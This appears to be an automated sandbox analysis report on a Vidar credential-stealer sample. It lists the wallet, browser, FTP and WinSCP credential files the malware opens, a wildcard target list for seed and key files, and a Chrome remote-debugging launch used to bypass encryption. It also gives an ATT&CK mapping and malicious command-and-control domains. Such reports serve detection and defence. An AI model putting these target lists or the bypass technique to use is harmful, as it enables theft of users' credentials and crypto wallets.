          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe PID: 7696, type: MEMORYSTR
          Found many strings related to Crypto-Wallets (likely being stolen)
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.000000000047E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.000000000047E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.000000000047E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
          Tries to harvest and steal Bitcoin Wallet information
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
          Tries to harvest and steal ftp login credentials
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
          Source: Yara matchFile source: 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe PID: 7696, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Attempt to bypass Chrome Application-Bound Encryption
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          Yara detected Vidar stealer
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe PID: 7696, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API          		1
          Create Account          		111
          Process Injection          		1
          Masquerading          		2
          OS Credential Dumping          		2
          System Time Discovery          		Remote Services1
          Screen Capture          		21
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Virtualization/Sandbox Evasion          		1
          Credentials in Registry          		11
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		1
          Remote Access Software          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
          Process Injection          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares4
          Data from Local System          		2
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS12
          Process Discovery          		Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets1
          Account Discovery          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials1
          System Owner/User Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync4
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem35
          System Information Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe65%VirustotalBrowse
          SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe58%ReversingLabsWin32.Ransomware.Vidar
          SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe100%AviraTR/AVI.vidar.tcybl

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://go.f.goldenloafuae.com/100%Avira URL Cloudmalware
          https://go.f.goldenloafuae.com/ozilla100%Avira URL Cloudmalware
          https://go.f.goldenloafuae.com/z100%Avira URL Cloudmalware
          https://go.f.goldenloafuae.com/5100%Avira URL Cloudmalware
          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg0%Avira URL Cloudsafe
          https://go.f.goldenloafuae.com/t100%Avira URL Cloudmalware
          https://go.f.goldenloafuae.comi0%Avira URL Cloudsafe
          https://go.f.goldenloafuae.com/N100%Avira URL Cloudmalware
          https://go.f.goldenloafuae.com50%Avira URL Cloudsafe
          https://go.f.goldenloafuae.com100%Avira URL Cloudmalware
          https://go.f.goldenloafuae.comX0%Avira URL Cloudsafe
          https://go.f.goldenloafuae.com/%100%Avira URL Cloudmalware
          https://go.f.goldenloafuae.comV0%Avira URL Cloudsafe
          https://go.f.goldenloafuae.com/g100%Avira URL Cloudmalware
          https://go.f.goldenloafuae.com/d100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          go.f.goldenloafuae.com
          		95.217.27.252
          		truetrue
            		unknown
            t.me
            		149.154.167.99
            		truefalse
              		high
              www.google.com
              		142.250.186.68
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://go.f.goldenloafuae.com/true
                • Avira URL Cloud: malware
                		unknown
                https://www.google.com/async/newtab_promosfalse
                  		high
                  https://www.google.com/async/ddljson?async=ntp:2false
                    		high
                    https://t.me/l793oyfalse
                      		high
                      https://steamcommunity.com/profiles/76561199829660832false
                        		high
                        https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                          		high
                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://go.f.goldenloafuae.com/NSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415731105.000000000051F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1415703142.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://go.f.goldenloafuae.com5SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1349855443.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://t.me/SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004A9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=kfuaiw.1.drfalse
                                		high
                                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://go.f.goldenloafuae.com/ozillaSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.00000000004EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://web.telegram.orgSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1252648727.0000000000502000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://t.me/l793oyir7amMozilla/5.0SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exefalse
                                    		high
                                    https://t.me/l793oy_SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1988758260.000000000047E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drfalse
                                        		high
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=kfuaiw.1.drfalse
                                          		high
                                          https://ac.ecosia.org?q=kfuaiw.1.drfalse
                                            		high
                                            https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989565252.0000000003303000.00000004.00000020.00020000.00000000.sdmp, m7ymoh.1.drfalse
                                              		high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000002.1989813367.000000000356B000.00000004.00000020.00020000.00000000.sdmp, kfuaiw.1.drfalse
                                                		high
                                                https://go.f.goldenloafuae.comiSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1440465464.000000000051F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://go.f.goldenloafuae.com/5SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                https://go.f.goldenloafuae.com/tSecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1320074974.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe, 00000001.00000003.1349855443.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
